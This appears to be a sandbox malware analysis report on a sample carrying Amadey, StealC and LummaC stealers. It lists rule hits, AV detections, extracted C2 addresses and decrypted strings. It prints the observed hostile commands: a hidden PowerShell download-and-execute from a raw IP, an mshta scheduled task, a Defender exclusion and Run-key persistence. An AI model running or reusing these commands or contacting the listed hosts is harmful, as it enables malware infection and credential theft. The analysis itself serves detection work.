Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 1988, ProcessName: schtasks.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe", ParentImage: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe, ParentProcessId: 2656, ParentProcessName: DX0TGIT2LZWIIEDZ8Y3A15R.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7184, ProcessName: chrome.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3d6f9fcfe.exe
Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ParentProcessId: 7948, ParentProcessName: cbfb8a9c89.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', ProcessId: 6180, ProcessName: powershell.exe
                                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ParentProcessId: 7948, ParentProcessName: cbfb8a9c89.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx', ProcessId: 6180, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1792, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 1476, ProcessName: powershell.exe

                                    Data Obfuscation

                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3388, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 6656, ProcessName: powershell.exe
                                    No Suricata rule has matched


                                    AV Detection

                                    Source: EdYEXasNiR.exe, Avira: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe, Avira: detection malicious, Label: TR/ATRAPS.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe, Avira: detection malicious, Label: HEUR/AGEN.1320706
                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmp, Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
                                    Source: EdYEXasNiR.exe.6464.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "framekgirus.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "fancywaxxers.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "PsFKDg--pablo"}
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe, ReversingLabs: Detection: 56%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exe, ReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exe, ReversingLabs: Detection: 30%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe, ReversingLabs: Detection: 47%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exe, ReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, ReversingLabs: Detection: 56%
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe, ReversingLabs: Detection: 30%
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe, ReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe, ReversingLabs: Detection: 47%
                                    Source: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe, ReversingLabs: Detection: 95%
                                    Source: EdYEXasNiR.exe, Virustotal: Detection: 56%
                                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe, Joe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe, Joe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe, Joe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe, Joe Sandbox ML: detected
                                    Source: EdYEXasNiR.exe, Joe Sandbox ML: detected
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FreeLibrary
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetTimeZoneInformation
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetSystemPowerStatus
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetVolumeInformationA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetWindowsDirectoryA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Process32First
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLocaleInfoA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetUserDefaultLocaleName
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetModuleFileNameA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DeleteFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FindNextFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: LocalFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FindClose
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SetEnvironmentVariableA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: LocalAlloc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetFileSizeEx
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ReadFile
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SetFilePointer
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: WriteFile
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FindFirstFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CopyFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: VirtualProtect
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLastError
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: lstrcpynA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: MultiByteToWideChar
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GlobalFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: WideCharToMultiByte
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GlobalAlloc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: OpenProcess
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: TerminateProcess
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetCurrentProcessId
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: gdiplus.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ole32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: bcrypt.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wininet.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: shlwapi.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: shell32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: rstrtmgr.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateCompatibleBitmap
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SelectObject
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BitBlt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DeleteObject
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateCompatibleDC
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipGetImageEncodersSize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipGetImageEncoders
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdiplusStartup
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdiplusShutdown
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipSaveImageToStream
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipDisposeImage
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetHGlobalFromStream
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateStreamOnHGlobal
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CoUninitialize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CoInitialize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CoCreateInstance
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptDecrypt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptSetProperty
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptDestroyKey
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetWindowRect
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetDesktopWindow
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetDC
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CloseWindow
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wsprintfA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: EnumDisplayDevicesA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetKeyboardLayoutList
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CharToOemW
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wsprintfW
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegQueryValueExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegEnumKeyExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegOpenKeyExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegCloseKey
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegEnumValueA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CryptBinaryToStringA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CryptUnprotectData
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SHGetFolderPathA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ShellExecuteExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetOpenUrlA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetConnectA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetCloseHandle
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HttpSendRequestA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HttpOpenRequestA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetReadFile
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetCrackUrlA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: StrCmpCA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: StrStrA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: StrCmpCW
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PathMatchSpecA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetModuleFileNameExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmStartSession
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmRegisterResources
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmGetList
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmEndSession
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_open
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_prepare_v2
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_step
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_column_text
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_finalize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_close
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_column_bytes
